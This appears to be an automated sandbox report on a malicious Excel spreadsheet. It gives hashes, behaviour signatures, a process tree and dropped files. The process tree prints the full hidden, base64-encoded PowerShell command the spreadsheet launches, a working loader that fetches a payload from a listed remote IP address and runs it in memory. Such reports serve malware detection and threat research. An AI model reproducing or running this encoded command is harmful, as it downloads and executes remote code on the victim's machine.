Analysis

  • max time kernel
    47s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 22:05

General

  • Target

    e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160.xls

  • Size

    46KB

  • MD5

    4cb9e433653daf1ac21b6852e6fa6fd6

  • SHA1

    0a98f758d62251129c9ac997fe3d7c43cdccd3d6

  • SHA256

    e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160

  • SHA512

    1bb0ffb07d750ce1f6720b05e67b9a06d8dd7fa7274afee511cc7983778a11493a39621585bf9c174e89e6e45eaf34961ce5aa129da82fc082d3dcbb744acb6c

  • SSDEEP

    768:I4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:DSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1y5lnxos\1y5lnxos.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:452
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BE2.tmp" "c:\Users\Admin\AppData\Local\Temp\1y5lnxos\CSC275C9672D2AB484FAF8EF19AEAC0D2C1.TMP"
          4⤵
            PID:3044

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\1y5lnxos\1y5lnxos.dll

      Filesize

      3KB

      MD5

      8f1548d0c4c1acad2f955707e5c970ce

      SHA1

      77eef5bbb4cadbf006a4ce11de4752a87b23cc41

      SHA256

      08eb795088187c65fc958985ade130d2fad8b396d9798b24e3958fa076c977d6

      SHA512

      8814dc843ad777662e8a89c0bf8be43288a759ba3079d4ae69bf056e4b47448c4cbcef52d50debb78882a7c4c10e5c18c4060f7c9f66086c440b44e03d6f9310

    • C:\Users\Admin\AppData\Local\Temp\RES9BE2.tmp

      Filesize

      1KB

      MD5

      560c5270f75ee32d921b2d1e49eaa09b

      SHA1

      3cbaff88fd668910b3d6977ea65bf4eac5ec99c5

      SHA256

      15f7d3d74d36e882f379d31ca2511976843434aaee1afdc89a85e637158834a3

      SHA512

      6be8f9e594b2d7c56952433124850ea33d1a919c2fd4fa79369a629f51967cad16a21fd8ac7de47b85d2518fde1b40baad605b68635617a5c5289e5cccd9befb

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xpkbppz3.fii.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • \??\c:\Users\Admin\AppData\Local\Temp\1y5lnxos\1y5lnxos.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\1y5lnxos\1y5lnxos.cmdline

      Filesize

      369B

      MD5

      cbb7714d772971b641a3918a36d06afb

      SHA1

      dab9deb0ee5726a4837f354291e456e6e600b7be

      SHA256

      dd023a41124933ada36d5c14db5f1e8940a90ed111876f1d90e4748949c72581

      SHA512

      c103d73a915ae161c6e42840afa2bdab70292074507b6251f05fbde8735790c5aa4af0470d60067bb8e713224495f23a675fdb985aa94aa897f2c811665cad2b

    • \??\c:\Users\Admin\AppData\Local\Temp\1y5lnxos\CSC275C9672D2AB484FAF8EF19AEAC0D2C1.TMP

      Filesize

      652B

      MD5

      215a91ea9fecbeac1580e17457437006

      SHA1

      4261d44fe704b520769e28e5c19fb81e6bafcd21

      SHA256

      10b402535098ef72a345aba1be929b03e907845ee103c72b84f392722a26e3b3

      SHA512

      94cf1d0ebcfea03823aaee989a8900b9c47113a5cbe3aaa324dbd15ab22e9f65b50eeec315828a65ef6cc49b2a88edc3c878d81cce3dd1210a86ea71899151dc

    • memory/4544-10-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-25-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-0-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-12-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-13-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-14-0x00007FFA3A3E0000-0x00007FFA3A3F0000-memory.dmp

      Filesize

      64KB

    • memory/4544-11-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-9-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-15-0x00007FFA3A3E0000-0x00007FFA3A3F0000-memory.dmp

      Filesize

      64KB

    • memory/4544-8-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-17-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-16-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-24-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-7-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-66-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-6-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-5-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-4-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-2-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-3-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-1-0x00007FFA7C66D000-0x00007FFA7C66E000-memory.dmp

      Filesize

      4KB

    • memory/4544-62-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-59-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-61-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-60-0x00007FFA7C66D000-0x00007FFA7C66E000-memory.dmp

      Filesize

      4KB

    • memory/4572-55-0x0000023C66710000-0x0000023C66718000-memory.dmp

      Filesize

      32KB

    • memory/4572-30-0x0000023C666E0000-0x0000023C66702000-memory.dmp

      Filesize

      136KB